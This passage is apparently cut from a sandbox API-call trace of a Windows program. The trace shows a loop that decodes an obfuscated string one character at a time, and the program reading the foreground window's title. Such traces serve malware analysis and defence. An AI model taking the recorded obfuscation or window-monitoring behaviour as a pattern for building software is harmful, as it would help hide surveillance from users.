lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.923] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.923] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.924] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.924] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.924] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.925] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.925] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.925] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.926] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.926] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.926] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.926] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.927] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.927] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.927] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.928] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.928] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.929] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.929] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.929] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.930] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.930] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.930] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.931] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.931] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.931] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.932] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.932] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.932] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.933] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.933] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0181.933] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.933] GetForegroundWindow () returned 0x20086 [0181.933] GetLastError () returned 0x0 [0181.934] SysStringLen (param_1=" ") returned 0xff [0181.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0181.934] SysStringLen (param_1=" ") returned 0xff [0181.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0181.934] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0181.934] GetLastError () returned 0x0 [0181.934] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0181.935] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0181.935] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0181.935] SysStringLen (param_1="Program Manager") returned 0x10 [0181.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Program Manager", cchWideChar=17, lpMultiByteStr=0x114721c, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Program Manager", lpUsedDefaultChar=0x0) returned 17 [0181.935] SetWindowTextA (hWnd=0x103c4, lpString="Program Manager") returned 1 [0181.936] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x2 [0181.936] GetFocus () returned 0x0 [0181.936] lstrlenA (lpString="Program Manager") returned 15 [0181.936] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x114721c) returned 0x1 [0181.936] IsWindow (hWnd=0x103c4) returned 1 [0181.936] IsWindow (hWnd=0x103c4) returned 1 [0181.937] IsWindow (hWnd=0x103c4) returned 1 [0181.937] IsWindow (hWnd=0x103c4) returned 1 [0181.937] GetFocus () returned 0x0 [0181.938] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0xf [0181.938] GetFocus () returned 0x0 [0181.938] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x10) returned 0x10e1d20 [0181.938] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x10, lParam=0x10e1d20) returned 0xf [0181.938] GetFocus () returned 0x0 [0181.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 16 [0181.938] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=-1, lpWideCharStr=0x114721c, cchWideChar=16 | out: lpWideCharStr="Program Manager") returned 16 [0181.938] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10e1d20 | out: hHeap=0x10d0000) returned 1 [0181.938] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0181.940] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.940] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.940] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0181.940] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.941] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.941] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.941] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0181.941] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.942] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.942] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.942] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0181.942] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.943] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.943] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.943] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0181.943] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.944] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.944] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.944] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0181.944] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.945] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0181.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.946] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.946] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0181.946] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.947] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.947] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0181.947] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.948] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.948] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0181.948] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.948] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.949] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.949] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0181.949] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.949] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.950] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0181.950] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.950] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.951] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0181.951] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.951] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0181.952] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.952] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.952] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.953] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.953] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.954] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.954] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0181.954] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.955] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.955] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0181.955] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.956] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0181.956] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.957] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0181.957] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0181.958] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0181.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 